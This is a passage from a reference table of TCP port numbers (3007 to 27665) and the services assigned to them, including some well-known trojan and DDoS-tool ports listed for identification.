TCP 3007 Lotus Mail Tracking Agent Protocol
TCP 3008 Midnight Technologies
TCP 3009 PXC-NTFY
TCP 3010 Telerate Workstation
TCP 3011 Trusted Web
TCP 3012 Trusted Web Client
TCP 3013 Gilat Sky Surfer
TCP 3014 Broker Service
TCP 3015 NATI DSTP
TCP 3016 Notify Server
TCP 3017 Event Listener
TCP 3018 Service Registry
TCP 3019 Resource Manager
TCP 3020 CIFS
TCP 3021 AGRI Server
TCP 3022 CSREGAGENT
TCP 3023 magicnotes
TCP 3024 NDS_SSO
TCP 3025 Arepa Raft
TCP 3026 AGRI Gateway
TCP 3027 LiebDevMgmt_C
TCP 3028 LiebDevMgmt_DM
TCP 3029 LiebDevMgmt_A
TCP 3030 Arepa Cas
TCP 3031 AgentVU
TCP 3032 Redwood Chat
TCP 3033 PDB
TCP 3034 Osmosis AEEA
TCP 3035 FJSV gssagt
TCP 3036 Hagel DUMP
TCP 3037 HP SAN Mgmt
TCP 3038 Santak UPS
TCP 3039 Cogitate Inc.
TCP 3040 Tomato Springs
TCP 3041 di-traceware
TCP 3042 journee
TCP 3043 BRP
TCP 3045 ResponseNet
TCP 3046 di-ase
TCP 3047 Fast Security HL Server
TCP 3048 Sierra Net PC Trader
TCP 3049 NSWS
TCP 3050 gds_db
TCP 3051 Galaxy Server
TCP 3052 APCPCNS
TCP 3053 dsom-server
TCP 3054 AMT CNF PROT
TCP 3055 Policy Server
TCP 3056 CDL Server
TCP 3057 GoAhead FldUp
TCP 3058 videobeans
TCP 3059 qsoft
TCP 3060 interserver
TCP 3061 cautcpd
TCP 3062 ncacn-ip-tcp
TCP 3063 ncadg-ip-udp
TCP 3065 slinterbase
TCP 3066 NETATTACHSDMP
TCP 3067 FJHPJP
TCP 3068 ls3 Broadcast
TCP 3069 ls3
TCP 3070 MGXSWITCH
TCP 3075 Orbix 2000 Locator
TCP 3076 Orbix 2000 Config
TCP 3077 Orbix 2000 Locator SSL
TCP 3078 Orbix 2000 Locator SSL
TCP 3079 LV Front Panel
TCP 3080 stm_pproc
TCP 3081 TL1-LV
TCP 3082 TL1-RAW
TCP 3083 TL1-TELNET
TCP 3084 ITM-MCCS
TCP 3085 PCIHReq
TCP 3086 JDL-DBKitchen
TCP 3105 Cardbox
TCP 3106 Cardbox HTTP
TCP 3127 W32.Mydoom virus
TCP 3128 Squid HTTP Proxy
TCP 3129 Master's Paradise (Windows Trojan)
TCP 3130 ICPv2
TCP 3131 Net Book Mark
TCP 3141 VMODEM
TCP 3142 RDC WH EOS
TCP 3143 Sea View
TCP 3144 Tarantella
TCP 3145 CSI-LFAP
TCP 3147 RFIO
TCP 3148 NetMike Game Administrator
TCP 3149 NetMike Game Server
TCP 3150 NetMike Assessor Administrator
TCP 3151 NetMike Assessor
TCP 3180 Millicent Broker Server
TCP 3181 BMC Patrol Agent
TCP 3182 BMC Patrol Rendezvous
TCP 3262 NECP
TCP 3264 cc:mail/lotus
TCP 3265 Altav Tunnel
TCP 3266 NS CFG Server
TCP 3267 IBM Dial Out
TCP 3268 Microsoft Global Catalog
TCP 3269 Microsoft Global Catalog with LDAP/SSL
TCP 3270 Verismart
TCP 3271 CSoft Prev Port
TCP 3272 Fujitsu User Manager
TCP 3273 Simple Extensible Multiplexed Protocol
TCP 3274 Ordinox Server
TCP 3275 SAMD
TCP 3276 Maxim ASICs
TCP 3277 AWG Proxy
TCP 3278 LKCM Server
TCP 3279 admind
TCP 3280 VS Server
TCP 3281 SYSOPT
TCP 3282 Datusorb
TCP 3283 Net Assistant
TCP 3284 4Talk
TCP 3285 Plato
TCP 3286 E-Net
TCP 3287 DIRECTVDATA
TCP 3288 COPS
TCP 3289 ENPC
TCP 3290 CAPS LOGISTICS TOOLKIT - LM
TCP 3291 S A Holditch &Associates - LM
TCP 3292 Cart O Rama
TCP 3293 fg-fps
TCP 3294 fg-gip
TCP 3295 Dynamic IP Lookup
TCP 3296 Rib License Manager
TCP 3297 Cytel License Manager
TCP 3298 Transview
TCP 3299 pdrncs
TCP 3300 bmc-patrol-agent
TCP 3301 Unathorised use by SAP R/3
TCP 3302 MCS Fastmail
TCP 3303 OP Session Client
TCP 3304 OP Session Server
TCP 3305 ODETTE-FTP
TCP 3306 MySQL
TCP 3307 OP Session Proxy
TCP 3308 TNS Server
TCP 3309 TNS ADV
TCP 3310 Dyna Access
TCP 3311 MCNS Tel Ret
TCP 3312 Application Management Server
TCP 3313 Unify Object Broker
TCP 3314 Unify Object Host
TCP 3315 CDID
TCP 3316 AICC/CMI
TCP 3317 VSAI PORT
TCP 3318 Swith to Swith Routing Information Protocol
TCP 3319 SDT License Manager
TCP 3320 Office Link 2000
TCP 3321 VNSSTR
TCP 3325 isi.edu
TCP 3326 SFTU
TCP 3327 BBARS
TCP 3328 Eaglepoint License Manager
TCP 3329 HP Device Disc
TCP 3330 MCS Calypso ICF
TCP 3331 MCS Messaging
TCP 3332 MCS Mail Server
TCP 3333 DEC Notes
TCP 3334 Direct TV Webcasting
TCP 3335 Direct TV Software Updates
TCP 3336 Direct TV Tickers
TCP 3337 Direct TV Data Catalog
TCP 3338 OMF data b
TCP 3339 OMF data l
TCP 3340 OMF data m
TCP 3341 OMF data h
TCP 3342 WebTIE
TCP 3343 MS Cluster Net
TCP 3344 BNT Manager
TCP 3345 Influence
TCP 3346 Trnsprnt Proxy
TCP 3347 Phoenix RPC
TCP 3348 Pangolin Laser
TCP 3349 Chevin Services
TCP 3350 FINDVIATV
TCP 3351 BTRIEVE
TCP 3352 SSQL
TCP 3353 FATPIPE
TCP 3354 SUITJD
TCP 3355 Hogle (proxy backdoor) / Ordinox Dbase
TCP 3356 UPNOTIFYPS
TCP 3357 Adtech Test IP
TCP 3358 Mp Sys Rmsvr
TCP 3359 WG NetForce
TCP 3360 KV Server
TCP 3361 KV Agent
TCP 3362 DJ ILM
TCP 3363 NATI Vi Server
TCP 3364 Creative Server
TCP 3365 Content Server
TCP 3366 Creative Partner
TCP 3371 ccm.jf.intel.com
TCP 3372 Microsoft Distributed Transaction Coordinator (MSDTC) / TIP 2
TCP 3373 Lavenir License Manager
TCP 3374 Cluster Disc
TCP 3375 VSNM Agent
TCP 3376 CD Broker
TCP 3377 Cogsys Network License Manager
TCP 3378 WSICOPY
TCP 3379 SOCORFS
TCP 3380 SNS Channels
TCP 3381 Geneous
TCP 3382 Fujitsu Network Enhanced Antitheft function
TCP 3383 Enterprise Software Products License Manager
TCP 3384 Cluster Management Services
TCP 3385 qnxnetman
TCP 3386 GPRS Data
TCP 3387 Back Room Net
TCP 3388 CB Server
TCP 3389 MS Terminal Server
TCP 3390 Distributed Service Coordinator
TCP 3391 SAVANT
TCP 3392 EFI License Management
TCP 3393 D2K Tapestry Client to Server
TCP 3394 D2K Tapestry Server to Server
TCP 3395 Dyna License Manager (Elam)
TCP 3396 Printer Agent
TCP 3397 Cloanto License Manager
TCP 3398 Mercantile
TCP 3399 CSMS
TCP 3400 CSMS2
TCP 3401 filecast
TCP 3410 Backdoor.OptixPro.13
TCP 3421 Bull Apprise portmapper
TCP 3454 Apple Remote Access Protocol
TCP 3455 RSVP Port
TCP 3456 VAT default data
TCP 3457 VAT default control
TCP 3458 D3WinOsfi
TCP 3459 TIP Integral
TCP 3460 EDM Manger
TCP 3461 EDM Stager
TCP 3462 EDM STD Notify
TCP 3463 EDM ADM Notify
TCP 3464 EDM MGR Sync
TCP 3465 EDM MGR Cntrl
TCP 3466 WORKFLOW
TCP 3467 RCST
TCP 3468 TTCM Remote Controll
TCP 3469 Pluribus
TCP 3470 jt400
TCP 3471 jt400-ssl
TCP 3535 MS-LA
TCP 3563 Watcom Debug
TCP 3572 harlequin.co.uk
TCP 3672 harlequinorb
TCP 3689 Apple Digital Audio Access Protocol
TCP 3802 VHD
TCP 3845 V-ONE Single Port Proxy
TCP 3862 GIGA-POCKET
TCP 3875 PNBSCADA
TCP 3900 Unidata UDT OS
TCP 3984 MAPPER network node manager
TCP 3985 MAPPER TCP/IP server
TCP 3986 MAPPER workstation server
TCP 3987 Centerline
TCP 4000 Terabase
TCP 4001 Cisco mgmt / NewOak
TCP 4002 pxc-spvr-ft
TCP 4003 pxc-splr-ft
TCP 4004 pxc-roid
TCP 4005 pxc-pin
TCP 4006 pxc-spvr
TCP 4007 pxc-splr
TCP 4008 NetCheque accounting
TCP 4009 Chimera HWM
TCP 4010 Samsung Unidex
TCP 4011 Alternate Service Boot
TCP 4012 PDA Gate
TCP 4013 ACL Manager
TCP 4014 TAICLOCK
TCP 4015 Talarian Mcast
TCP 4016 Talarian Mcast
TCP 4017 Talarian Mcast
TCP 4018 Talarian Mcast
TCP 4019 Talarian Mcast
TCP 4045 nfs-lockd
TCP 4096 BRE (Bridge Relay Element)
TCP 4097 Patrol View
TCP 4098 drmsfsd
TCP 4099 DPCP
TCP 4132 NUTS Daemon
TCP 4133 NUTS Bootp Server
TCP 4134 NIFTY-Serve HMI protocol
TCP 4141 Workflow Server
TCP 4142 Document Server
TCP 4143 Document Replication
TCP 4144 Compuserve pc windows
TCP 4160 Jini Discovery
TCP 4199 EIMS ADMIN
TCP 4299 earth.path.net
TCP 4300 Corel CCam
TCP 4321 Remote Who Is
TCP 4333 mini-sql server
TCP 4343 UNICALL
TCP 4344 VinaInstall
TCP 4345 Macro 4 Network AS
TCP 4346 ELAN LM
TCP 4347 LAN Surveyor
TCP 4348 ITOSE
TCP 4349 File System Port Map
TCP 4350 Net Device
TCP 4351 PLCY Net Services
TCP 4353 F5 iQuery
TCP 4397 Phatbot Worm
TCP 4442 Saris
TCP 4443 Pharos
TCP 4444 AdSubtract / NV Video default
TCP 4445 UPNOTIFYP
TCP 4446 N1-FWP
TCP 4447 N1-RMGMT
TCP 4448 ASC Licence Manager
TCP 4449 PrivateWire
TCP 4450 Camp
TCP 4451 CTI System Msg
TCP 4452 CTI Program Load
TCP 4453 NSS Alert Manager
TCP 4454 NSS Agent Manager
TCP 4455 PR Chat User
TCP 4456 PR Chat Server
TCP 4457 PR Register
TCP 4500 sae-urn
TCP 4501 urn-x-cdchoice
TCP 4545 WorldScores
TCP 4546 SF License Manager (Sentinel)
TCP 4547 Lanner License Manager
TCP 4557 FAX transmission service
TCP 4559 HylaFAX client-service protocol
TCP 4567 TRAM
TCP 4568 BMC Reporting
TCP 4600 Piranha1
TCP 4601 Piranha2
TCP 4662 eDonkey2k
TCP 4663 eDonkey
TCP 4665 eDonkey2k
TCP 4672 remote file access server
TCP 4675 eMule
TCP 4711 eMule
TCP 4772 eMule
TCP 4800 Icona Instant Messenging System
TCP 4801 Icona Web Embedded Chat
TCP 4802 Icona License System Server
TCP 4827 HTCP
TCP 4837 Varadero-0
TCP 4838 Varadero-1
TCP 4868 Photon Relay
TCP 4869 Photon Relay Debug
TCP 4885 ABBS
TCP 4899 RAdmin Win32 remote control
TCP 4983 AT&T Intercom
TCP 5000 UPnP / filmaker.com / Socket de Troie (Windows Trojan)
TCP 5001 filmaker.com / Socket de Troie (Windows Trojan)
TCP 5002 radio free ethernet
TCP 5003 FileMaker Inc. - Proprietary transport
TCP 5004 avt-profile-1
TCP 5005 avt-profile-2
TCP 5006 wsm server
TCP 5007 wsm server ssl
TCP 5010 TelepathStart
TCP 5011 TelepathAttack
TCP 5020 zenginkyo-1
TCP 5021 zenginkyo-2
TCP 5042 asnaacceler8db
TCP 5050 Yahoo Messenger / multimedia conference control tool
TCP 5051 ITA Agent
TCP 5052 ITA Manager
TCP 5055 UNOT
TCP 5060 SIP
TCP 5069 I/Net 2000-NPR
TCP 5071 PowerSchool
TCP 5093 Sentinel LM
TCP 5099 SentLM Srv2Srv
TCP 5101 Yahoo! Messenger
TCP 5145 RMONITOR SECURE
TCP 5150 Ascend Tunnel Management Protocol
TCP 5151 ESRI SDE Instance
TCP 5152 ESRI SDE Instance Discovery
TCP 5165 ife_1corp
TCP 5190 America-Online
TCP 5191 AmericaOnline1
TCP 5192 AmericaOnline2
TCP 5193 AmericaOnline3
TCP 5200 Targus AIB 1
TCP 5201 Targus AIB 2
TCP 5202 Targus TNTS 1
TCP 5203 Targus TNTS 2
TCP 5222 Jabber Server
TCP 5232 SGI Distribution Graphics
TCP 5236 padl2sim
TCP 5272 PK
TCP 5300 HA cluster heartbeat
TCP 5301 HA cluster general services
TCP 5302 HA cluster configuration
TCP 5303 HA cluster probing
TCP 5304 HA Cluster Commands
TCP 5305 HA Cluster Test
TCP 5306 Sun MC Group
TCP 5307 SCO AIP
TCP 5308 CFengine
TCP 5309 J Printer
TCP 5310 Outlaws
TCP 5311 TM Login
TCP 5400 Excerpt Search / Blade Runner (Windows Trojan)
TCP 5401 Excerpt Search Secure / Blade Runner (Windows Trojan)
TCP 5402 MFTP / Blade Runner (Windows Trojan)
TCP 5403 HPOMS-CI-LSTN
TCP 5404 HPOMS-DPS-LSTN
TCP 5405 NetSupport
TCP 5406 Systemics Sox
TCP 5407 Foresyte-Clear
TCP 5408 Foresyte-Sec
TCP 5409 Salient Data Server
TCP 5410 Salient User Manager
TCP 5411 ActNet
TCP 5412 Continuus
TCP 5413 WWIOTALK
TCP 5414 StatusD
TCP 5415 NS Server
TCP 5416 SNS Gateway
TCP 5417 SNS Agent
TCP 5418 MCNTP
TCP 5419 DJ-ICE
TCP 5420 Cylink-C
TCP 5421 Net Support 2
TCP 5422 Salient MUX
TCP 5423 VIRTUALUSER
TCP 5426 DEVBASIC
TCP 5427 SCO-PEER-TTA
TCP 5428 TELACONSOLE
TCP 5429 Billing and Accounting System Exchange
TCP 5430 RADEC CORP
TCP 5431 PARK AGENT
TCP 5432 postgres database server
TCP 5435 Data Tunneling Transceiver Linking (DTTL)
TCP 5454 apc-tcp-udp-4
TCP 5455 apc-tcp-udp-5
TCP 5456 apc-tcp-udp-6
TCP 5461 SILKMETER
TCP 5462 TTL Publisher
TCP 5465 NETOPS-BROKER
TCP 5490 Squid HTTP Proxy
TCP 5500 fcp-addr-srvr1
TCP 5501 fcp-addr-srvr2
TCP 5502 fcp-srvr-inst1
TCP 5503 fcp-srvr-inst2
TCP 5504 fcp-cics-gw1
TCP 5510 ACE/Server Services
TCP 5520 ACE/Server Services
TCP 5530 ACE/Server Services
TCP 5540 ACE/Server Services
TCP 5550 ACE/Server Services
TCP 5554 SGI ESP HTTP
TCP 5555 Personal Agent
TCP 5556 Mtbd (mtb backup)
TCP 5559 Enterprise Security Remote Install axent.com
TCP 5599 Enterprise Security Remote Install
TCP 5600 Enterprise Security Manager
TCP 5601 Enterprise Security Agent
TCP 5602 A1-MSC
TCP 5603 A1-BS
TCP 5604 A3-SDUNode
TCP 5605 A4-SDUNode
TCP 5631 pcANYWHEREdata
TCP 5632 pcANYWHEREstat
TCP 5678 LinkSys EtherFast Router Remote Administration / Remote Replication Agent Connection
TCP 5679 Direct Cable Connect Manager
TCP 5680 Canna (Japanese Input)
TCP 5713 proshare conf audio
TCP 5714 proshare conf video
TCP 5715 proshare conf data
TCP 5716 proshare conf request
TCP 5717 proshare conf notify
TCP 5729 Openmail User Agent Layer
TCP 5741 IDA Discover Port 1
TCP 5742 IDA Discover Port 2 / Wincrash (Windows Trojan)
TCP 5745 fcopy-server
TCP 5746 fcopys-server
TCP 5755 OpenMail Desk Gateway server
TCP 5757 OpenMail X.500 Directory Server
TCP 5766 OpenMail NewMail Server
TCP 5767 OpenMail Suer Agent Layer (Secure)
TCP 5768 OpenMail CMTS Server
TCP 5771 NetAgent
TCP 5800 VNC Virtual Network Computing
TCP 5801 VNC Virtual Network Computing
TCP 5813 ICMPD
TCP 5859 WHEREHOO
TCP 5900 VNC Virtual Network Computing
TCP 5901 VNC Virtual Network Computing
TCP 5968 mppolicy-v5
TCP 5969 mppolicy-mgr
TCP 5977 NCD preferences TCP port
TCP 5978 NCD diagnostic TCP port
TCP 5979 NCD configuration TCP port
TCP 5980 VNC Virtual Network Computing
TCP 5981 VNC Virtual Network Computing
TCP 5987 Solaris Web Enterprise Management RMI
TCP 5997 NCD preferences telnet port
TCP 5998 NCD diagnostic telnet port
TCP 5999 CVSup
TCP 6000 X-Windows
TCP 6001 Cisco mgmt
TCP 6003 Half-Life WON server
TCP 6063 X Windows System mit.edu
TCP 6064 NDL-AHP-SVC
TCP 6065 WinPharaoh
TCP 6066 EWCTSP
TCP 6067 SRB
TCP 6068 GSMP
TCP 6069 TRIP
TCP 6070 Messageasap
TCP 6071 SSDTP
TCP 6072 DIAGNOSE-PROC
TCP 6073 DirectPlay8
TCP 6100 SynchroNet-db
TCP 6101 SynchroNet-rtc
TCP 6102 SynchroNet-upd
TCP 6103 RETS
TCP 6104 DBDB
TCP 6105 Prima Server
TCP 6106 MPS Server
TCP 6107 ETC Control
TCP 6108 Sercomm-SCAdmin
TCP 6109 GLOBECAST-ID
TCP 6110 HP SoftBench CM
TCP 6111 HP SoftBench Sub-Process Control
TCP 6112 dtspcd
TCP 6123 Backup Express
TCP 6129 DameWare
TCP 6141 Meta Corporation License Manager
TCP 6142 Aspen Technology License Manager
TCP 6143 Watershed License Manager
TCP 6144 StatSci License Manager - 1
TCP 6145 StatSci License Manager - 2
TCP 6146 Lone Wolf Systems License Manager
TCP 6147 Montage License Manager
TCP 6148 Ricardo North America License Manager
TCP 6149 tal-pod
TCP 6253 CRIP
TCP 6321 Empress Software Connectivity Server 1
TCP 6322 Empress Software Connectivity Server 2
TCP 6346 Gnutella/Bearshare file sharing Application
TCP 6389 clariion-evr01
TCP 6400 saegatesoftware.com
TCP 6401 saegatesoftware.com
TCP 6402 saegatesoftware.com
TCP 6403 saegatesoftware.com
TCP 6404 saegatesoftware.com
TCP 6405 saegatesoftware.com
TCP 6406 saegatesoftware.com
TCP 6407 saegatesoftware.com
TCP 6408 saegatesoftware.com
TCP 6409 saegatesoftware.com
TCP 6410 saegatesoftware.com
TCP 6455 SKIP Certificate Receive
TCP 6456 SKIP Certificate Send
TCP 6471 LVision License Manager
TCP 6500 BoKS Master
TCP 6501 BoKS Servc
TCP 6502 BoKS Servm
TCP 6503 BoKS Clntd
TCP 6505 BoKS Admin Private Port
TCP 6506 BoKS Admin Public Port
TCP 6507 BoKS Dir Server Private Port
TCP 6508 BoKS Dir Server Public Port
TCP 6547 apc-tcp-udp-1
TCP 6548 apc-tcp-udp-2
TCP 6549 apc-tcp-udp-3
TCP 6550 fg-sysupdate
TCP 6558 xdsxdm
TCP 6588 AnalogX Web Proxy
TCP 6665 Internet Relay Chat
TCP 6666 IRC
TCP 6667 IRC
TCP 6668 IRC
TCP 6669 IRC
TCP 6670 Vocaltec Global Online Directory / Deep Throat 2 (Windows Trojan)
TCP 6672 vision_server
TCP 6673 vision_elmd
TCP 6699 Napster
TCP 6700 Napster / Carracho (server)
TCP 6701 Napster / Carracho (server)
TCP 6711 SubSeven (Windows Trojan)
TCP 6701 KTI/ICAD Nameserver
TCP 6723 DDOS communication TCP
TCP 6767 BMC PERFORM AGENT
TCP 6768 BMC PERFORM MGRD
TCP 6776 SubSeven/BackDoor-G (Windows Trojan)
TCP 6789 IBM DB2
TCP 6790 HNMP / IBM DB2
TCP 6831 ambit-lm
TCP 6841 Netmo Default
TCP 6842 Netmo HTTP
TCP 6850 ICCRUSHMORE
TCP 6881 BitTorrent Network
TCP 6888 MUSE
TCP 6891 MS Messenger file transfer
TCP 6901 MS Messenger voice calls
TCP 6961 JMACT3
TCP 6962 jmevt2
TCP 6963 swismgr1
TCP 6964 swismgr2
TCP 6965 swistrap
TCP 6966 swispol
TCP 6969 acmsoda
TCP 6998 IATP-highPri
TCP 6999 IATP-normalPri
TCP 7000 IRC / file server itself
TCP 7001 WebLogic Server / Callbacks to cache managers
TCP 7002 WebLogic Server (SSL) / Half-Life Auth Server / Users &groups database
TCP 7003 volume location database
TCP 7004 AFS/Kerberos authentication service
TCP 7005 volume managment server
TCP 7006 error interpretation service
TCP 7007 basic overseer process
TCP 7008 server-to-server updater
TCP 7009 remote cache manager service
TCP 7010 onlinet uninterruptable power supplies
TCP 7011 Talon Discovery Port
TCP 7012 Talon Engine
TCP 7013 Microtalon Discovery
TCP 7014 Microtalon Communications
TCP 7015 Talon Webserver
TCP 7020 DP Serve
TCP 7021 DP Serve Admin
TCP 7070 ARCP
TCP 7099 lazy-ptop
TCP 7100 X Font Service
TCP 7121 Virtual Prototypes License Manager
TCP 7141 vnet.ibm.com
TCP 7161 Catalyst
TCP 7174 Clutild
TCP 7200 FODMS FLIP
TCP 7201 DLIP
TCP 7323 3.11 Remote Administration
TCP 7326 Internet Citizen's Band
TCP 7390 The Swiss Exchange swx.ch
TCP 7395 winqedit
TCP 7426 OpenView DM Postmaster Manager
TCP 7427 OpenView DM Event Agent Manager
TCP 7428 OpenView DM Log Agent Manager
TCP 7429 OpenView DM rqt communication
TCP 7430 OpenView DM xmpv7 api pipe
TCP 7431 OpenView DM ovc/xmpv3 api pipe
TCP 7437 Faximum
TCP 7491 telops-lmd
TCP 7511 pafec-lm
TCP 7544 FlowAnalyzer DisplayServer
TCP 7545 FlowAnalyzer UtilityServer
TCP 7566 VSI Omega
TCP 7570 Aries Kfinder
TCP 7588 Sun License Manager
TCP 7597 TROJAN WORM
TCP 7633 PMDF Management
TCP 7640 CUSeeMe
TCP 7777 Oracle App server / cbt
TCP 7778 Interwise
TCP 7781 accu-lmgr
TCP 7786 MINIVEND
TCP 7932 Tier 2 Data Resource Manager
TCP 7933 Tier 2 Business Rules Manager
TCP 7967 Supercell
TCP 7979 Micromuse-ncps
TCP 7980 Quest Vista
TCP 7999 iRDMI2
TCP 8000 HTTP/iRDMI
TCP 8001 HTTP/VCOM Tunnel
TCP 8002 HTTP/Teradata ORDBMS
TCP 8007 Apache JServ Protocol
TCP 8008 HTTP Alternate
TCP 8009 Apache JServ Protocol
TCP 8010 Wingate HTTP Proxy
TCP 8032 ProEd
TCP 8033 MindPrint
TCP 8080 HTTP / HTTP Proxy
TCP 8081 HTTP / HTTP Proxy
TCP 8129 Snapstream PVS Server
TCP 8130 INDIGO-VRMI
TCP 8131 INDIGO-VBCP
TCP 8160 Patrol
TCP 8161 Patrol SNMP
TCP 8181 IPSwitch IMail / Monitor
TCP 8200 TRIVNET
TCP 8201 TRIVNET
TCP 8204 LM Perfworks
TCP 8205 LM Instmgr
TCP 8206 LM Dta
TCP 8207 LM SServer
TCP 8208 LM Webwatcher
TCP 8351 Server Find
TCP 8376 Cruise ENUM
TCP 8377 Cruise SWROUTE
TCP 8378 Cruise CONFIG
TCP 8379 Cruise DIAGS
TCP 8383 Web Email
TCP 8380 Cruise UPDATE
TCP 8484 Ipswitch IMail
TCP 8400 cvd
TCP 8401 sabarsd
TCP 8402 abarsd
TCP 8403 admind
TCP 8431 Micro PC-Cilin
TCP 8450 npmp
TCP 8473 Virtual Point to Point
TCP 8484 Ipswitch Web Calendar
TCP 8554 RTSP Alternate (see port 554)
TCP 8733 iBus
TCP 8763 MC-APPSERVER
TCP 8764 OPENQUEUE
TCP 8765 Ultraseek HTTP
TCP 8804 truecm
TCP 8880 CDDBP
TCP 8888 NewsEDGE server TCP / AnswerBook2
TCP 8889 Desktop Data TCP 1
TCP 8890 Desktop Data TCP 2
TCP 8891 Desktop Data TCP 3: NESS application
TCP 8892 Desktop Data TCP 4: FARM product
TCP 8893 Desktop Data TCP 5: NewsEDGE/Web application
TCP 8894 Desktop Data TCP 6: COAL application
TCP 8900 JMB-CDS 1
TCP 8901 JMB-CDS 2
TCP 8999 Firewall
TCP 9000 CSlistener
TCP 9001 cisco-xremote
TCP 9090 WebSM
TCP 9100 HP JetDirect
TCP 9160 NetLOCK1
TCP 9161 NetLOCK2
TCP 9162 NetLOCK3
TCP 9163 NetLOCK4
TCP 9164 NetLOCK5
TCP 9200 WAP connectionless session service
TCP 9201 WAP session service
TCP 9202 WAP secure connectionless session service
TCP 9203 WAP secure session service
TCP 9204 WAP vCard
TCP 9205 WAP vCal
TCP 9206 WAP vCard Secure
TCP 9207 WAP vCal Secure
TCP 9273 BackGate (Windows rootkit)
TCP 9274 BackGate (Windows rootkit)
TCP 9275 BackGate (Windows rootkit)
TCP 9276 BackGate (Windows rootkit)
TCP 9277 BackGate (Windows rootkit)
TCP 9278 BackGate (Windows rootkit)
TCP 9280 HP JetDirect Embedded Web Server
TCP 9290 HP JetDirect
TCP 9291 HP JetDirect
TCP 9292 HP JetDirect
TCP 9321 guibase
TCP 9343 MpIdcMgr
TCP 9344 Mphlpdmc
TCP 9374 fjdmimgr
TCP 9396 fjinvmgr
TCP 9397 MpIdcAgt
TCP 9500 ismserver
TCP 9535 Remote man server
TCP 9537 Remote man server, testing
TCP 9594 Message System
TCP 9595 Ping Discovery Service
TCP 9600 MICROMUSE-NCPW
TCP 9753 rasadv
TCP 9876 Session Director
TCP 9888 CYBORG Systems
TCP 9898 MonkeyCom
TCP 9899 SCTP TUNNELING
TCP 9900 IUA
TCP 9909 domaintime
TCP 9950 APCPCPLUSWIN1
TCP 9951 APCPCPLUSWIN2
TCP 9952 APCPCPLUSWIN3
TCP 9992 Palace
TCP 9993 Palace
TCP 9994 Palace
TCP 9995 Palace
TCP 9996 Palace
TCP 9997 Palace
TCP 9998 Distinct32
TCP 9999 distinct
TCP 10000 Webmin / Network Data Management Protocol
TCP 10001 queue
TCP 10002 poker
TCP 10003 gateway
TCP 10004 remp
TCP 10005 Secure telnet
TCP 10007 MVS Capacity
TCP 10012 qmaster
TCP 10080 Amanda
TCP 10082 Amanda Indexing
TCP 10083 Amanda Tape Indexing
TCP 10113 NetIQ Endpoint
TCP 10114 NetIQ Qcheck
TCP 10115 Ganymede Endpoint
TCP 10128 BMC-PERFORM-SERVICE DAEMON
TCP 10288 Blocks
TCP 10520 Acid Shivers (Windows Trojan)
TCP 11000 IRISA
TCP 11001 Metasys
TCP 11111 Viral Computing Environment (VCE)
TCP 11367 ATM UHAS
TCP 11523 AdSubtract AOL Proxy
TCP 11720 h323 Call Signal Alternate
TCP 12000 IBM Enterprise Extender SNA XID Exchange
TCP 12001 IBM Enterprise Extender SNA COS Network Priority
TCP 12002 IBM Enterprise Extender SNA COS High Priority
TCP 12003 IBM Enterprise Extender SNA COS Medium Priority
TCP 12004 IBM Enterprise Extender SNA COS Low Priority
TCP 12172 HiveP
TCP 12345 Netbus (Windows Trojan)
TCP 12346 NetBus (Windows Trojan)
TCP 12361 Whack-a-mole (Windows Trojan)
TCP 12362 Whack-a-mole (Windows Trojan)
TCP 12753 tsaf port
TCP 12754 DDOS communication TCP
TCP 13160 I-ZIPQD
TCP 13223 PowWow Client
TCP 13224 PowWow Server
TCP 13326 game
TCP 13720 BPRD Protocol (VERITAS NetBackup)
TCP 13721 BPBRM Protocol (VERITAS NetBackup)
TCP 13722 BP Java MSVC Protocol
TCP 13782 VERITAS NetBackup
TCP 13783 VOPIED Protnocol
TCP 13818 DSMCC Config
TCP 13819 DSMCC Session Messages
TCP 13820 DSMCC Pass-Thru Messages
TCP 13821 DSMCC Download Protocol
TCP 13822 DSMCC Channel Change Protocol
TCP 14001 ITU SCCP (SS7)
TCP 15104 DDOS communication TCP
TCP 16360 netserialext1
TCP 16361 netserialext2
TCP 16367 netserialext3
TCP 16368 netserialext4
TCP 16660 Stacheldraht distributed attack tool client
TCP 16959 Subseven DEFCON8 2.1 backdoor remote access tool
TCP 16991 INTEL-RCI-MP
TCP 17007 isode-dua
TCP 17219 Chipper
TCP 17300 Kuang2 (Windows remote access trojan)
TCP 17990 Worldspan gateway
TCP 18000 Beckman Instruments Inc.
TCP 18181 OPSEC CVP
TCP 18182 OPSEC UFP
TCP 18183 OPSEC SAM
TCP 18184 OPSEC LEA
TCP 18185 OPSEC OMI
TCP 18187 OPSEC ELA
TCP 18463 AC Cluster
TCP 18753 Shaft distributed attack tool handler agent
TCP 18888 APCNECMP
TCP 19216 BackGate (Windows rootkit)
TCP 19283 Key Server for SASSAFRAS
TCP 19315 Key Shadow for SASSAFRAS
TCP 19410 hp-sco
TCP 19411 hp-sca
TCP 19412 HP-SESSMON
TCP 19541 JCP Client
TCP 20000 DNP
TCP 20005 xcept4 (German Telekom's CEPT videotext service)
TCP 20034 NetBus 2 Pro (Windows Trojan)
TCP 20432 Shaft distributed attack client
TCP 20670 Track
TCP 20999 At Hand MMP
TCP 21554 (trojan)
TCP 21590 VoFR Gateway
TCP 21845 webphone
TCP 21846 NetSpeak Corp. Directory Services
TCP 21847 NetSpeak Corp. Connection Services
TCP 21848 NetSpeak Corp. Automatic Call Distribution
TCP 21849 NetSpeak Corp. Credit Processing System
TCP 22000 SNAPenetIO
TCP 22001 OptoControl
TCP 22156 Phatbot Worm
TCP 22273 wnn6
TCP 22289 Wnn6 (Chinese Input)
TCP 22305 Wnn6 (Korean Input)
TCP 22321 Wnn6 (Taiwanese Input)
TCP 22555 Vocaltec Web Conference
TCP 22800 Telerate Information Platform LAN
TCP 22951 Telerate Information Platform WAN
TCP 23485 Shareasa file sharing
TCP 24000 med-ltp
TCP 24001 med-fsp-rx
TCP 24002 med-fsp-tx
TCP 24003 med-supp
TCP 24004 med-ovw
TCP 24005 med-ci
TCP 24006 med-net-svc
TCP 24386 Intel RCI
TCP 24554 BINKP
TCP 25000 icl-twobase1
TCP 25001 icl-twobase2
TCP 25002 icl-twobase3
TCP 25003 icl-twobase4
TCP 25004 icl-twobase5
TCP 25005 icl-twobase6
TCP 25006 icl-twobase7
TCP 25007 icl-twobase8
TCP 25008 icl-twobase9
TCP 25009 icl-twobase10
TCP 21554 Girlfriend (Windows Trojan)
TCP 25793 Vocaltec Address Server
TCP 25867 WebCam32 Admin
TCP 26000 quake
TCP 26208 wnn6-ds
TCP 26274 Delta Source (Windows Trojan)
TCP 27374 SubSeven / Linux.Ramen.Worm (RedHat Linux)
TCP 27665 Trinoo distributed attack tool Master server control port
